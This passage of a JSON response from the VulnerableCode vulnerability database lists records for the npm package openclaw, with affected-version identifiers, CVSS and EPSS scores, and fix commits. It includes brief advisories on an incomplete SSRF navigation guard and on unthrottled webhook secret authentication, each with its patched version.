lity":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4
316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c
76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p
7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x
4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35621","GHSA-94pw-c6m8-p9p9"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pa1f-qzsh-efa9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89001?format=json","vulnerability_id":"VCID-pae5-uyu7-k3c1","summary":"OpenClaw: Browser press/type interaction routes missed complete navigation guard coverage\n## Summary\n\nBrowser press/type interaction routes missed complete navigation guard coverage.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nSome 
browser press/type style interactions could trigger navigation without complete post-action SSRF policy enforcement.\n\n## Technical Details\n\nThe fix applies a three-phase interaction navigation guard to navigation-capable interactions, including pressKey and type submit flows.\n\n## Fix\n\nThe issue was fixed in #62023, #63226, and #63889. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe`\n- `5f5b3d733bdd791cb457f838514179e1288b10b3`\n- `e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894`\n- PR: #62023, #63226, #63889\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43580","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10026","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.1001","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1159","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43580"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe"
,"reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"}],"url":"https://github.com/openclaw/openclaw/commit/049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"}],"url":"https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894"},{"reference_url":"https://github.com/openclaw/openclaw/pu
ll/62023","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/62023"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63226","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63226"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63889","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63889"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-536q-mj95-h29h","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":
"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-536q-mj95-h29h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43580","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43580"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-incomplete-navigation-guard-coverage-in-browser-interactions","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-incomplete-navigation-guard-coverage-in-browser-interactions"},{"reference_url":"https://github.com/advisories/GHSA-536q-mj95-h29h","reference_id":"GHSA-536q-mj95-h29h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-536q-mj95-h29h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-
n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43580","GHSA-536q-mj95-h29h"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pae5-uyu7-k3c1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91337?format=json","vulnerability_id":"VCID-pc9z-x5wk-8ue7","summary":"OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret 
authentication\n## Summary\n\nNextcloud Talk webhook signature failures were not throttled even though the integration relies on an operator-configured shared secret that may be weak.\n\n## Impact\n\nAn attacker who could reach the webhook endpoint could brute-force weak secrets online and then forge inbound webhook events.\n\n## Affected Component\n\n`extensions/nextcloud-talk/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `e403decb6e` (`nextcloud-talk: throttle repeated webhook auth failures`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33580","reference_id":"","reference_type":"","scores":[{"value":"0.00064","scoring_system":"epss","scoring_elements":"0.19981","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.24086","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.24069","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33580"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:
T/2026-03-31T17:18:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T17:18:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33580","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33580"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/20
26-03-31T17:18:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication"},{"reference_url":"https://github.com/advisories/GHSA-9528-x887-j2fp","reference_id":"GHSA-9528-x887-j2fp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9528-x887-j2fp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2
